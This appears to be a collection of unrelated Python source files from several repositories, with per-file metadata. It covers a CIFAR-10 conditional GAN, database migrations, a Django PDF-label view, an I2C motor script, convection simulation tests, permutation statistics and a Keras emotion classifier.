label = Input(shape=(1,), dtype='int32')
label_embedding = Flatten()(Embedding(self.num_classes, 32 * 32 * 3)(label))
x2 = Dense(32 * 32 * 3, activation="relu")(label_embedding)
x2 = Reshape((32, 32, 3))(x2)
x = Concatenate()([img,x2])
x = Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x) # 0.5
x = Conv2D(64, kernel_size=3, strides=2, padding="same")(x)
x = ZeroPadding2D(padding=((0,1),(0,1)))(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Conv2D(128, kernel_size=3, strides=2, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Conv2D(256, kernel_size=3, strides=1, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Flatten()(x)
x = Dense(1, activation='sigmoid')(x)
#model.summary()
return Model([img, label], x)
def train(self, epochs, batch_size=128, sample_interval=50):
# Load the dataset
(x_train, y_train), (_, _) = cifar10.load_data()
# Configure input
x_train = (x_train.astype(np.float32) - 127.5) / 127.5
y_train = y_train.reshape(-1, 1)
# Adversarial ground truths
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
for epoch in range(epochs):
# ---------------------
# Train Discriminator
# ---------------------
# Select a random half batch of images
idx = np.asarray(range(x_train.shape[0]))
np.random.shuffle(idx)
for i in range(int(x_train.shape[0]/batch_size)):
sub_idx = idx[i*batch_size:(i+1)*batch_size]
imgs, labels = x_train[sub_idx], y_train[sub_idx]
# Sample noise as generator input
noise = np.random.normal(0, 1, (batch_size, self.latent_dim))
# Generate a half batch of new images
gen_imgs = self.generator.predict([noise, labels])
# Train the discriminator
d_loss_real = self.discriminator.train_on_batch([imgs, labels], valid)
d_loss_fake = self.discriminator.train_on_batch([gen_imgs, labels], fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# ---------------------
# Train Generator
# ---------------------
# Condition on labels
sampled_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)
# Train the generator
g_loss = self.combined.train_on_batch([noise, sampled_labels], valid)
# Plot the progress
print ("%d [D loss: %f, acc.: %.2f%%] [G loss: %f]" % (epoch, d_loss[0], 100*d_loss[1], g_loss))
# If at save interval => save generated image samples
if epoch % sample_interval == 0:
self.sample_images(epoch)
def sample_images(self, epoch):
r, c = 2, 5
noise = np.random.normal(0, 1, (r * c, self.latent_dim))
sampled_labels = np.arange(0, 10).reshape(-1, 1)
gen_imgs = self.generator.predict([noise, sampled_labels])
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt, :,:, :])
axs[i,j].title.set_text(t.categories[cnt])
axs[i,j].axis('off')
cnt += 1
fig.suptitle('epochs = '+ str(epoch))
fig.savefig( os.path.join(os.getcwd(), 'CGAN', 'images', "cifar10_%d_%d.png" % (self.latent_dim, epoch)) )
plt.close()
if __name__ == '__main__':
cgan = CGAN()
if multi_gpu == True:
cgan.train(epochs=101, batch_size=32*8, sample_interval=10)
else:
cgan.train(epochs=101, batch_size=32, sample_interval=10)
| 7,624 |
migrations/versions/1c172052d272_created_table_tasks.py
|
thainaferreira/matriz-de-eisenhower
| 0 |
2022798
|
"""Created table Tasks
Revision ID: 1c172052d272
Revises: 9bc65293e9cc
Create Date: 2021-10-05 00:37:41.299386
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '9bc65293e9cc'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('tasks',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=100), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('importance', sa.Integer(), nullable=True),
sa.Column('urgency', sa.Integer(), nullable=True),
sa.Column('eisenhower_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['eisenhower_id'], ['eisenhowers.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('tasks')
# ### end Alembic commands ###
| 1,133 |
pdf/views.py
|
spalk/Plant-Passport-gitpod
| 0 |
2023229
|
from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseForbidden
from django.contrib.auth.decorators import login_required
from plants.models import Plant
from plants.entities import RichPlant
from plants.services import check_is_user_owner_of_plant
from .services import LabelsBuilder
@login_required
def get_labels_pdf(request):
"""Returns PDF file with Labels for requested Plants"""
# processing user data
if request.method == 'POST':
if request.POST['plant_ids']:
# get rich plants
plant_ids = request.POST.getlist('plant_ids')
plants = Plant.objects.filter(id__in=plant_ids)
rich_plants = []
for plant in plants:
rich_plants.append(RichPlant(plant))
# check access (is owner) for all plants
current_user = request.user
for rich_plant in rich_plants:
user_is_owner = check_is_user_owner_of_plant(current_user, rich_plant)
if not user_is_owner:
return HttpResponseForbidden()
# generate and return pdf
labels = LabelsBuilder(rich_plants, current_user)
labels.generate_labels()
path_to_pdf = labels.get_pdf()
if path_to_pdf:
pdf_file = open(path_to_pdf, 'rb')
response = HttpResponse(content=pdf_file)
response['Content-Type'] = 'application/pdf'
response['Content-Disposition'] = f'attachment; filename="{current_user.username}_labels.pdf"'
return response
        else:
            # Http404 is an exception; it must be raised, not returned
            raise Http404("No plants were received")
else:
return HttpResponseForbidden()
| 1,762 |
flightControl/Python/i2cesc.py
|
robertIanClarkson/Air-Pixel
| 0 |
2023656
|
import smbus
import time
ESC_ADDR = 0x29
THROTTLE_ADDR_L = 0x00
THROTTLE_ADDR_H = 0x01
arm = 0x00
start = 0x0A
stop = 0x00
bus = smbus.SMBus(1)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, arm)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, arm)
time.sleep(1)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, start)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, start)
time.sleep(2)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, stop)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, stop)
| 525 |
generate_graphs/generate_example.py
|
QuentinDeHaes/Unboundedness-for-1-VASS
| 0 |
2023796
|
from graph import Graph
from Node import Node, NodeCreator
def generate_example():
"""
generates the example graph from the paper
:return: the example graph
"""
s0 = Node(0)
s1 = Node(1)
s2 = Node(2)
s3 = Node(3)
s4 = Node(4)
s5 = Node(5)
s6 = Node(6)
s7 = Node(7)
s8 = Node(8)
s9 = Node(9)
s10 = Node(10)
s11 = Node(11)
s12 = Node(12)
s13 = Node(13)
s0.add_edge(s1, 12)
s1.add_edge(s2, -12)
s2.add_edge(s1, 18)
s1.add_edge(s3, 12)
s3.add_edge(s4, 30)
s4.add_edge(s5, -52)
s5.add_edge(s6, 52)
s6.add_edge(s4, 9)
s4.add_edge(s7, 4)
s7.add_edge(s8, 4)
s8.add_edge(s9, -3)
s9.add_edge(s10, 17)
s10.add_edge(s11, -80)
s11.add_edge(s12, 81)
s12.add_edge(s13, 3)
s13.add_edge(s10, 6)
s1.add_disequality(60)
s3.add_disequality(30)
s4.add_disequality(90)
s5.add_disequality(41)
s6.add_disequality(96)
s7.add_disequality(70)
s8.add_disequality(80)
s9.add_disequality(80)
s10.add_disequality(120)
s11.add_disequality(43)
s12.add_disequality(130)
s13.add_disequality(130)
g = Graph(s0)
g.set_nodes([s0, s1, s2, s3, s4, s5, s6, s7, s8, s9, s10, s11, s12, s13])
return g
| 1,260 |
tests/test_slow_RB.py
|
snek5000/snek5000-cbox
| 0 |
2023699
|
from shutil import rmtree
import pytest
import numpy as np
from snek5000 import load
from snek5000_cbox.solver import Simul
@pytest.mark.slow
def params_RB():
params = Simul.create_default_params()
aspect_ratio = params.oper.aspect_ratio = 1.0 / 41
params.prandtl = 1.0
params.Ra_vert = 1705
params.output.sub_directory = "tests_snek_cbox"
params.oper.nproc_min = 2
params.oper.dim = 2
nb_elements = 1
params.oper.ny = nb_elements
params.oper.nx = int(nb_elements / aspect_ratio)
params.oper.nz = int(nb_elements / aspect_ratio)
Ly = params.oper.Ly
Lx = params.oper.Lx = Ly / aspect_ratio
params.oper.x_periodicity = True
params.oper.mesh_stretch_factor = 0.0
params.oper.elem.order = params.oper.elem.order_out = 12
# creation of the coordinates of the points saved by history points
n1d = 4
small = Lx / 10
xs = np.linspace(0, Lx, n1d)
xs[0] = small
xs[-1] = Lx - small
ys = np.linspace(0, Ly, n1d)
ys[0] = small
ys[-1] = Ly - small
coords = [(x, y) for x in xs for y in ys]
params.output.history_points.coords = coords
params.oper.max.hist = len(coords) + 1
params.nek.general.dt = 0.05
params.nek.general.end_time = 500
params.nek.general.stop_at = "endTime"
params.nek.general.target_cfl = 2.0
params.nek.general.time_stepper = "BDF3"
params.nek.general.write_control = "runTime"
params.nek.general.write_interval = 1000
params.output.history_points.write_interval = 100
params.output.phys_fields.write_interval_pert_field = 200
return params
# for an infinite layer of fluid with Pr = 1.0, the onset of convection is at Ra_c = 1708
@pytest.mark.slow
def test_simple_RB_nonconvective_simul():
params = params_RB()
params.Ra_vert = 1705
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check a physical result,
temperature_last = df[df.time == t_max].temperature
assert temperature_last.abs().max() < 0.45
# check we do not have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() < 1e-7 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_simple_RB_convective_simul():
params = params_RB()
params.Ra_vert = 1750
params.nek.general.end_time = 2000
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check a physical result,
temperature_last = df[df.time == t_max].temperature
assert temperature_last.abs().max() < 0.45
# check we have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() > 2e-2 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_RB_linear_nonconvective_simul():
params = params_RB()
params.Ra_vert = 1705
params.nek.problemtype.equation = "incompLinNS"
params.oper.elem.staggered = "auto"
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check we do not have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() < 1e-7 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
@pytest.mark.slow
def test_RB_linear_convective_simul():
params = params_RB()
params.Ra_vert = 1750
params.nek.general.end_time = 2000
params.nek.problemtype.equation = "incompLinNS"
params.oper.elem.staggered = "auto"
sim = Simul(params)
sim.make.exec("run_fg", resources={"nproc": 4})
sim = load(sim.path_run)
coords, df = sim.output.history_points.load()
times = df[df.index_points == 1].time
t_max = times.max()
# check we have convection,
ux_last = df[df.time == t_max].ux
assert ux_last.abs().max() > 2e-2 # noise amplitude is 1e-5
# if everything is fine, we can cleanup the directory of the simulation
rmtree(sim.path_run, ignore_errors=True)
| 4,648 |
languageserver/server/__init__.py
|
cybojenix/languageserver-python
| 0 |
2023686
|
from typing import TYPE_CHECKING, Optional, Type
from .registry import Registry
if TYPE_CHECKING:
from .registry import T_Arg, T_Ret, MakesAsync, RegisterTarget
from languageserver.protocol.requests import Request
from languageserver.protocol.notifications import Notification
class Server:
registry: Registry
def __init__(self, registry: Optional[Registry] = None):
self.registry = registry or Registry()
def on(
self, request_type: "Type[RegisterTarget[T_Arg, T_Ret]]",
) -> "MakesAsync[T_Arg, T_Ret]":
return self.registry.register(request_type)
async def send_request(self, request: "Request[T_Arg, T_Ret]") -> T_Ret:
pass
async def send_notification(self, notification: "Notification[T_Arg]") -> None:
pass
| 796 |
python/ssm/stats/permutation_testing.py
|
ClinicalCardiovascEngGroup/SSM
| 4 |
2022630
|
#!/usr/bin/python
# coding: utf8
"""
Simplified version of stat_t_test (without multiprocessing),
used to compute the Hotelling statistic.
Threshold for independent testing:
    rv = scipy.stats.t(df=(n1 + n2 - 2))
    th = rv.ppf(0.95)
"""
import numpy as np
from .statistics import *
################################################################################
def zmap_1perm_2samp(X, cat1, cat2=None, rand_seed=-1, fstat=None, name=None):
""" une permutation
X (D, N, P) K points, N subjects, D dim
return:
Y (D,) zvalue at each point
"""
if fstat is None:
fstat = hotelling_2samples
#name = "MP-Hotelling"
if cat2 is None:
cat2 = np.logical_not(cat1)
    # Data
    if rand_seed < 0:
        # Without permutation (cat could be replaced by idx[cat])
        ix1 = cat1
        ix2 = cat2
    else:
        # With permutation
np.random.seed(rand_seed)
idx = np.arange(X.shape[1])[cat1 | cat2]
per = np.random.permutation(idx.size)
nsplit = cat1.sum()
ix1 = idx[per][:nsplit]
ix2 = idx[per][nsplit:]
# Run
Y = fstat(X[:, ix1, :], X[:, ix2, :])
if name is not None:
print(name + " {0}, {1}\n".format(Y.min(), Y.max()))
return Y
def zval_kperm_2samp(X, cat1, cat2=None, nperm=100, fstat=None):
"""
simple loop, no optimization
return the extrema sorted
return:
lmin, lmax
"""
if cat2 is None:
cat2 = np.logical_not(cat1)
lmin = np.zeros((nperm,))
lmax = np.zeros((nperm,))
for i in range(nperm):
Y0 = zmap_1perm_2samp(X, cat1, cat2, rand_seed=i, fstat=fstat)
lmax[i] = Y0.max()
lmin[i] = Y0.min()
lmax.sort()
lmin.sort()
return lmin, lmax
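# Hypothetical usage sketch (names and parameters illustrative, commented out so it
# does not run on import): build the permutation null from the group labels, then
# threshold the unpermuted map with compute_pvalues (defined below).
#
#     zmap = zmap_1perm_2samp(X, cat1, cat2, rand_seed=-1)    # observed map
#     lmin, lmax = zval_kperm_2samp(X, cat1, cat2, nperm=1000)
#     pval = compute_pvalues(zmap, lmax, alpha_threshold=0.05)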
################################################################################
def zmap_1perm_2pairedsamp(X, rand_seed=-1, name=None):
""" une permutation (changement de signe)
X (D, N, P) D points, N subjects, P dim
return:
Y (D,) zvalue at each point
"""
(d, n, p) = X.shape
    # Data
    if rand_seed < 0:
        # Without permutation
        sign_swap = np.ones((1, n, 1))
    else:
        # With permutation
sign_swap = np.random.randint(0, 2, size=(1, n, 1))
sign_swap = 2*sign_swap - 1
# Run
Y = hotelling_1sample(X * sign_swap)
if name is not None:
print(name + " {0}, {1}\n".format(Y.min(), Y.max()))
return Y
def zval_kperm_2pairedsamp(X, nperm):
"""
simple loop, no optimization
return the extrema sorted
return:
lmin, lmax
"""
lmin = np.zeros((nperm,))
lmax = np.zeros((nperm,))
for i in range(nperm):
Y0 = zmap_1perm_2pairedsamp(X, rand_seed=i)
lmax[i] = Y0.max()
lmin[i] = Y0.min()
lmax.sort()
lmin.sort()
return lmin, lmax
################################################################################
def zmap_kperm_llh(X, y, nperm, nvar0=1):
"""
WIP
log-likelihood testing for non parametric permutation regression testing
nvar0 is used to set the reference model
X (n, d, p) deformation
y (n, q) clinicals
return
L (d, nperm+1)
L[:, 0], no-permutation map
np.max(L[:, 1:], axis=0) permutation maxs
"""
n, d, p = X.shape
K = np.zeros((d, 1))
L = np.zeros((d, nperm+1))
# reference model and no permutation
K[:, 0] = regression_loglikelihood(X, y[:, :nvar0])
L[:, 0] = regression_loglikelihood(X, y)
# with perm
for k in range(nperm):
#np.random.seed(k)
per = np.random.permutation(n)
yp = y.copy()
yp[:, nvar0:] = y[per, nvar0:]
L[:, k+1] = regression_loglikelihood(X, yp)
L = L - K
return L, L[:, 0], np.max(L[:, 1:], axis=0)
################################################################################
def compute_pvalues(zmap, zsamp, alpha_threshold=1., do_sort=True):
"""
Compute p-values on the right only using:
- zmap (vdim,) z-values
- zsamp (nsamp,) empirical z samples
    return the smallest k such that not (zmap[i] > zsamp[k])
    can perform asymmetric search on the right and left
    (todo: see np.searchsorted)
"""
vdim = zmap.size
nsamp = zsamp.size
if nsamp == 1:
zsamp.shape = (1,)
if do_sort:
zsamp.sort()
k_threshold = (1. - alpha_threshold)*nsamp
pval = np.zeros(vdim, dtype="uint16")
for i in range(vdim):
k = 0
while k < nsamp and zmap[i] > zsamp[k]:
k += 1
if k >= k_threshold:
pval[i] = k
return pval
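# --- Added sketch, not part of the original module ---
# The docstring above suggests np.searchsorted; a minimal vectorized equivalent of
# compute_pvalues is sketched below. The function name is illustrative, and it
# assumes zsamp can be sorted up front (as in compute_pvalues with do_sort=True).
def compute_pvalues_searchsorted(zmap, zsamp, alpha_threshold=1., do_sort=True):
    """Vectorized variant of compute_pvalues using np.searchsorted."""
    zsamp = np.sort(zsamp) if do_sort else zsamp
    k_threshold = (1. - alpha_threshold) * zsamp.size
    # number of empirical samples strictly below each z-value
    k = np.searchsorted(zsamp, zmap, side="left")
    return np.where(k >= k_threshold, k, 0).astype("uint16")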
| 4,629 |
src/lang/TestCases/TranslatorTestCases/wrapper_Check.py
|
Tootooroo/DevAutomator
| 0 |
2023776
|
import pytest
import ast
import astpretty
import DevAuto.Translator.ast_wrappers as wrapper
class Wrapper_TC:
@pytest.mark.skip
def test_Wrap_Expr_In_Func(self) -> None:
node = ast.Constant(value=123, kind=None)
ast.fix_missing_locations(node)
node = wrapper.wrap_expr_in_func("TEST", ["A1", "*", "A2"], node)
assert type(node) == ast.Call
assert node.func.id == "TEST"
assert node.args[0].id == "A1"
assert node.args[1].value == 123
assert node.args[2].id == "A2"
| 542 |
src/gui/migrations/0022_knowledgearticle_knowledgeattachment.py
|
digitalfabrik/ish-goalkeeper
| 12 |
2022764
|
# Generated by Django 3.2.6 on 2021-10-28 11:36
from django.db import migrations, models
import django.db.models.deletion
import filer.fields.file
import mptt.fields
class Migration(migrations.Migration):
dependencies = [
('filer', '0012_file_mime_type'),
('gui', '0021_auto_20211021_1333'),
]
operations = [
migrations.CreateModel(
name='KnowledgeArticle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500, verbose_name='Titel')),
('content', models.TextField(blank=True, verbose_name='Inhalt')),
('lft', models.PositiveIntegerField(editable=False)),
('rght', models.PositiveIntegerField(editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='gui.knowledgearticle', verbose_name='Übergeordneter Artikel')),
],
options={
'verbose_name': 'Wissen-Artikel',
'verbose_name_plural': 'Wissen-Artikel',
},
),
migrations.CreateModel(
name='KnowledgeAttachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, verbose_name='Titel')),
('attached_file', filer.fields.file.FilerFileField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='knowledge_file', to='filer.file', verbose_name='Datei')),
('knowledge_article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='attachments', to='gui.knowledgearticle', verbose_name='Wissen-Artikel')),
],
options={
'verbose_name': 'Wissens-Artikel-Anhang',
'verbose_name_plural': 'Wissens-Artikel-Anhänge',
},
),
]
| 2,279 |
model.py
|
SauravCR7/Blissify.ai
| 4 |
2023127
|
import numpy as np
import cv2
from keras.models import model_from_json
# Load the model architecture and trained weights.
model = model_from_json(open('model.json').read())
model.load_weights('weights.h5')
def predict(X):
    # Preprocess: resize to 64x64, convert to grayscale, add batch and channel axes.
    image = cv2.resize(X, (64, 64), interpolation=cv2.INTER_CUBIC)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    image = image.reshape(1, 64, 64, 1)
    pr = model.predict(image)[0]
    # Class index 3 is treated as "Happy"; everything else as "Sad".
    label = "Happy" if int(np.argmax(pr)) == 3 else "Sad"
    return label
X = cv2.imread("data/testset/face5.jpeg")
p = predict(X)
print(p)
| 566 |